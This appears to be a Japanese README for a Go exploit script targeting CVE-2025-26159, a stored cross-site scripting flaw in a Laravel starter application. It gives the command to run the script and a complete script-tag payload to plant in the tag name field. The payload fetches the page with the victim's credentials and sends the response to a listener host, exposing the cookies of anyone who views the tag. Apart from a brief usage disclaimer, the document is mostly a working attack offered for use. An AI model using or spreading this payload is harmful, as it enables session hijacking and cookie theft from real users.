
CVE-2025-26159のGoベースのエクスプロイトスクリプト。保存型XSSペイロード注入を介してLaravelアプリケーションからクッキーをデコード、フィルタリング、抽出します。
このスクリプトは、明示的な許可が与えられた認可された環境でのみ使用されるべきです。作者は、このスクリプトの使用に起因する誤用、損害、または結果について一切の責任を負いません。
このスクリプトは、CVE-2025-26159の悪用の一環として、Cookieをデコード、フィルタリング、抽出します。
悪用の手順を理解するには、私のブログのこの記事を確認してください。
go run CVE-2025-26159.go
Laravelスターターのタグ名フィールドに、次のペイロードを追加します。
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
ユーザーが悪意のあるタグの詳細ページにアクセスすると、そのユーザーのCookieを取得できます。